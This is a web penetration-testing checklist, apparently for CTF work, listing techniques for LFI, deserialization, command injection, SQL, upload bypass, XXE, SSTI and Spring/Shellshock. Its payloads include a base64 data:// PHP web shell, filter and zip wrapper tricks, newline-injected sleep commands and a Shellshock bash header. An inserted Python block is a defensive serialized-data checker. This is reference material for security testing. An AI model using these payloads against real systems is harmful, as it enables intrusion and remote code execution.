Web pentest checklist !!!

Server side

  • Reconnaissance

    /robots.txt, /.well-known/security.txt, /sitemap.xml
    Tinker with cookies
    Directory indexing.
    Headers
    • Server
    • X-Powered-By: PHP
    • X-AspNet-Version: ASP.Net
    • x-cache, x-status, hit/miss: web cache
    • X-Application-Context: spring boot
    frontend: bottom of HTML, comments, js, css, ...
    old, bak files (backup.zip, ctf_name.zip,...), .git, .bzr, ...
  • Advanced reconnaissance

    DNS dumps, certificates: crt.sh, securitytrails
    Directory scanning
    Weak passwords, brute force
    nmap
  • Directory traversal, LFI
    php://filter/read=string.rot13/resource=, pHp://FilTer/convert.base64-encode/resource=, php://filter/zlib.deflate/convert.base64-encode/resource= (payload-all-the-thing)
    RFI
    Loose comparison, type juggling
    PHP-type-comparison-tables
    $_SESSION["uninitialized"] === NULL
    Redirect without die(): the code after the header() call still executes
    Upload a library and use LD_PRELOAD to bypass disable_functions
    Advanced inclusion
    RCE data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
    RCE php://input
    RCE /proc/self/fd/... (brute-force the fd number to reach access.log or error.log)
    via PHP sessions
    Upload a zipped payload, then use the zip stream wrapper zip://shell.jpg%23payload.php
    Deserialization
    New properties can be declared and assigned inside serialized data.
    PHP method/function names are case insensitive.
    Default PHP interfaces such as ArrayAccess, ArrayIterator and Serializable add further magic methods: offsetGet(), offsetSet(), current()
    Use the S type and \00 escapes to bypass null-byte filters (mates2019r4-web2); not necessary with PHP >= 7.2
    Use R to reference another property: O:8:"stdClass":2:{s:3:"xyz";s:1:"u";s:4:"flag";R:2;}
    phpggc
    File functions with the phar:// wrapper: ripstech-New-PHP-Exploitation-Technique-Added, It's-a-PHP-unserialization-vulnerability-Jim, ...
    Possible SSRF with __call() [1]
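The deserialization items above all rely on unserialize() accepting object tokens and back-references from untrusted input. As an added example (not from this checklist), the walker below parses PHP's serialize() format and reports which classes a blob would instantiate and how many R:/r: references it carries, so a defender can reject anything that is not plain scalars and arrays before it reaches unserialize(); the second sample blob is constructed, the first is the checklist's own R: example.

```python
# Added example: inspect a PHP serialize() blob before unserialize().
# Reports classes (O:) and back-references (R:/r:); custom-serialized
# objects (C:) and malformed input raise ValueError, which a caller should
# treat as a reject too.  Equivalent in effect to PHP's own
# unserialize($s, ['allowed_classes' => false]) plus a reference check.

def _walk(d, pos, found):
    """Parse one value at d[pos]; return the position just after it."""
    t = d[pos]
    if t == "N":                          # N;
        return pos + 2
    if t in "ibd":                        # i:1;  b:1;  d:1.5;
        return d.index(";", pos) + 1
    if t in "Rr":                         # R:2; / r:2; reference to value #2
        found["refs"] += 1
        return d.index(";", pos) + 1
    if t == "s":                          # s:<bytes>:"...";
        colon = d.index(":", pos + 2)
        n = int(d[pos + 2:colon])
        return colon + n + 4              # skip :"<n bytes>";
    if t == "a":                          # a:<count>:{k;v;k;v;...}
        colon = d.index(":", pos + 2)
        p = colon + 2                     # skip :{
        for _ in range(2 * int(d[pos + 2:colon])):
            p = _walk(d, p, found)
        return p + 1                      # skip }
    if t == "O":                          # O:<len>:"Class":<count>:{...}
        c1 = d.index(":", pos + 2)
        name_len = int(d[pos + 2:c1])
        found["classes"].append(d[c1 + 2:c1 + 2 + name_len])
        c2 = d.index(":", c1 + name_len + 4)   # count follows the closing quote
        p = c2 + 2                        # skip :{
        for _ in range(2 * int(d[c1 + name_len + 4:c2])):
            p = _walk(d, p, found)
        return p + 1
    raise ValueError(f"unsupported or malformed token {t!r} at {pos}")


def inspect_serialized(blob: str) -> dict:
    """Return {'classes': [...], 'refs': int, 'plain': bool}; 'plain' means
    only scalars and arrays, the only shape to accept from a client."""
    d = blob.encode("utf-8").decode("latin-1")   # 1 char == 1 byte, as PHP counts
    found = {"classes": [], "refs": 0}
    if _walk(d, 0, found) != len(d):
        raise ValueError("trailing data after serialized value")
    found["plain"] = not found["classes"] and found["refs"] == 0
    return found


if __name__ == "__main__":
    for blob in ('O:8:"stdClass":2:{s:3:"xyz";s:1:"u";s:4:"flag";R:2;}',
                 'a:2:{i:0;s:5:"hello";s:3:"key";b:1;}'):   # second one constructed
        print(blob, "->", inspect_serialized(blob))
```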
  • Command injection

    sleep 3
    %0asleep 3
    ;%0asleep 3
    dns-based ref0
  • SQL

    Escaping
    Use \
    Use \" inside JSON
    Others
    MySQL truncation
    MySQL doesn't distinguish "lol" from "lol " -> a duplicate entry can be inserted
  • Upload files

    PHP upload files
    .php .php3 .php4 .php5 .php7 .htaccess .pht .phtm .phtml .phar .phps
    Upload a zip file containing a symlink: ln -s ../index.php abc.txt; zip -y abc.zip abc.txt
    PHP exif_imagetype only checks the first bytes (magic bytes)
    ASP upload files
    .aspx .shtml .stm .config .ashx .asmx .aspq .axd .cshtm .cshtml .rem .soap .vbhtm .vbhtml .asa .asp .cer
    Upload .htaccess file https://github.com/wireghoul/htshells
    Upload web.config file [1]
    Bypasses
    Extensions
    MIME types
    NULL byte (%00, or hex-edit in Burp)
  • XXE

    out of band ref0
    Redefine a local DTD: //mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
  • NoSQL

    Check with {"ne":1} and check error with {"$where":1}
  • SSTI

    portswigger, payload-all-the-thing
    Flask-RCE (refer to tplmap ): payload, search.py
  • More

    HTTP Verb Tampering
    XSLT
    LDAP injection
    XPath injection
  • Misc, logic bugs, bypass

    \u0061 (unicode) in JSON
    Host header attack on the password reset function https://tradahacking.vn/ho%C3%A0i-ni%E1%BB%87m-d8133ecf0dea
  • Applications/Frameworks (misuse, CVEs, ...)

    spring framework
    AutoBinding / Mass Assignment: Web-CTF-Cheatsheet, volgactf-shop, volgactf-shopv2
    spring boot
    Actuator endpoints swisskyrepo [1]
    jolokia
    Install a new jar: 0ctf2019-ghostpepper
    Apache mod-cgi
    Shellshock User-Agent: () { :;}; /bin/bash -c '...' (ritsecctf-web4, cve-detail)
  • Privilege Escalation

    Wildcard injection with chown or tar [1]
CRLF injection

Client side